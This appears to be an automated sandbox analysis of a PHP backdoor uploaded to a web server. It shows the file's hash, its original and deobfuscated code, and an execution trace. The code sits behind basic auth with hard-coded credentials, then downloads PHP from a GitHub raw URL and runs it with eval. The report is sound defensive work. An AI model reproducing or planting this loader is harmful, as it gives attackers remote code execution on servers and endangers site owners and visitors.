PHP Malware Analysis

nah.pHP

md5: 1636a1281bc0b8fa6d098ab5aebdab9a

Deobfuscated PHP code

<?php

$user = "admin";
$pass = "ex";
if ($_SERVER["PHP_AUTH_USER"] != $user || $_SERVER["PHP_AUTH_PW"] != $pass) {
    header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
    header("HTTP/1.0 401 Unauthorized");
    exit;
}
@null;
@eval("?>" . file_get_contents("https://raw.githubusercontent.com/Helloween1205/log/main/log.php"));

Execution traces

data/traces/1636a1281bc0b8fa6d098ab5aebdab9a_trace-1676256600.1774.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:50:26.075247]
1	0	1	0.000161	393512
1	3	0	0.000219	395288	{main}	1		/var/www/html/uploads/nah.pHP	0	0
1		A						/var/www/html/uploads/nah.pHP	2	$user = 'admin'
1		A						/var/www/html/uploads/nah.pHP	4	$pass = 'ex'
2	4	0	0.000281	395288	header	0		/var/www/html/uploads/nah.pHP	10	1	'WWW-Authenticate: Basic realm="dvildance was here"'
2	4	1	0.000300	395416
2	4	R			NULL
2	5	0	0.000314	395384	header	0		/var/www/html/uploads/nah.pHP	12	1	'HTTP/1.0 401 Unauthorized'
2	5	1	0.000329	395448
2	5	R			NULL
			0.000359	316432
TRACE END   [2023-02-13 00:50:26.075478]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
$user = "admin";

$pass = "ex";

 if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))

 {

  header("WWW-Authenticate: Basic realm=\"dvildance was here\"");

  header("HTTP/1.0 401 Unauthorized");

  exit();

 }
?>
<? @null;@eval("?>".file_get_contents("https://raw.githubusercontent.com/Helloween1205/log/main/log.php"));?>